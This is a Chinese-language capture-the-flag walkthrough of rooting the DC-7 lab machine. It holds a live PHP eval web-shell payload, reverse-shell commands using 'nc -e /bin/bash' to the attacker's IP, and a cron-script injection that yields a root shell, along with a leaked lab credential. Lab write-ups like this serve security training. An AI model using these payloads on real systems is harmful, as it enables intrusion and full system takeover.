DC-7渗透过程(kali IP:192.168.229.132 靶机IP:192.168.229.155)
**一.信息收集**
nmap -sP 192.168.229.0/24
nmap -sV -p- 192.168.229.155
dirsearch -u 192.168.229.155 -e * -x 404,403
whatweb 192.168.229.155
//发现是cms是drupal 8,提示我们不能像常规的解法,暴力破解也不行,这里提示我们要用社工,分析页面发现有个@DC7user,去网上搜发现github上有个这个作者,点进去看发现是源码,查找发现有个账号密码,dc7user MdR3xOgB7#dW
**二.提权**
ssh dc7user@192.168.229.155
ls
cat mbox //发现有个mbox文件,打开看看发现是root以定时任务cron发送的,进入脚本文件看看
cd /opt/scripts
ls -l //发现www-data有写入和执行权限但dcuser没有,则我们要尝试找到www-data的权限
cat backups.sh //发现可以用drush这个命令,则可以利用它来修改用户密码,但这个命令需要先切换到drupal的目录
cd /var/www/html
drush user-information admin //这里猜有admin用户,查看一下信息,还真有
drush upwd admin --password="123456" //修改admin的密码,登录进去看看,发现content板块可以写入html文件,但不能写入php文件,收集信息发现可以新增php模块,把这个url写到那个添加链接中https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz
<?php @eval($_REQUEST['shell'])?> //写入后门代码,用哥斯拉连接
nc -e /bin/bash 192.168.229.132 8888 //连接虚拟shell
cd /opt/scripts
echo "nc -e /bin/bash 192.168.229.132 7777" >> backups.sh //利用root的定时任务反向连接 root权限的shell,等待执行即可连接root权限
find / -name * flag.*
cat theflag.txt